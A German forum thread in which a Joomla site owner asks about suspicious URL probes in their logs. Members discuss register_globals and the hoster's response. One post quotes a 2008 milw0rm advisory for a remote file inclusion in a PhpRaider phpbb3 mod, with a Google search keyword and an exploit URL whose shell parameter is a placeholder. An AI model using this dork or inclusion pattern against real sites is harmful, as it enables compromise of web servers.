Thema: Zugriff -- Seiten Url Frage

Hallo zusammen,

ich habe von meinem Hoster eine Statistik mit einem Vermerk bekommen!

In diesem Mail stand drin, dass jemand mit folgenden Links auf meine Seite zugegriffen hatte, aber diess keine Joomla-Standarturl's von mir sind!

• /authentication/phpbb3/phpbb3.functions.php
• //phpbb3/phpbb3.functions.php
• /components/com_ponygallery/js/pngbehavior.htc
• /4520.html
• /components/com_securityimages/plugins/hncaptcha/1.0/imageGenerator.php

Benutze Joomla 1.0.15 mit htacess vor dem Joomla Login!

Bitte um Hinweise von Euch!?

Hallo,

ist dies trotz Register Globals: OFF?

Werde ich gerade machen!!

Hallo,

ich musste diese auf Deutsch übersetzten, und habe aber kein Fix gefunden!!

Seite ist Offline!!

Wäre net, wenn jemand mir einen Link zu dem Fix schicken könnet, da ich nur sehr wenig Englisch kann!!

HHallo,

habe dies gefunden:

Code:

< ------------------- header data start ------------------- >

#############################################################

# Application Name : PhpRaider Mod phpbb3

# Vulnerable Type : Remote File Include

# Google Keyword : Powered by phpRaider v1.0.7

# Infection : İlgili site ve sunucuya erişim sağlanabilir.

# Bug Fix Advice : Undefined değerler, tanımlanmalıdır.

# author : KaCaK a.K.a Dr.Hack3r

# Error Code : include_once($pConfig_auth['phpbb_path'].'common.php');

Kacakizm Bir Yaşam Felsefesi

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

www.site.com/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]

< -- bug code end of -- >

# milw0rm.com [2008-05-24]

Wie muss ich diesen handhaben?!

Hallo,

ist dies jetzt ein Problem von Joomla oder von meinem Hoster?!

Register-Globals sollte immer(!) ausgeschaltet sein. Software, die noch diese EInstellung zwangsweise benötigt (es gibt da leider nicht einige Kandidaten) sollte man den Programmieren um die Ohren hauen...
Vielen Hoster trauen sich nicht diese Option zu deaktvieren, weil sie Angst um einige Kunden haben die dann ggf. meckern könnten (eine andere Erklärung hab ich dafür nicht). Da läßt man lieber fatal sicherheitskritische Einstellungen stehen... Das Web ist voll von Meldungen über gehackte Server auf Basis dieser und anderer Einstellungen.

Hallo zusammen,

ich habe meinem Hoster ein Mail geschrieben mit einem Link in dieses Forum!!

Folgendes habe ich bis heute erhalten:

Bei Ihrer Anfrage scheint es sich um ein umfangreicheres Problem zu handeln.
Ich habe deshalb Ihre Anfrage direkt an unsere Administratoren weitergeleitet
welche sich mit Ihnen in Verbindung setzen werden, sobald eine Lösung für Ihr
Problem gefunden wurde.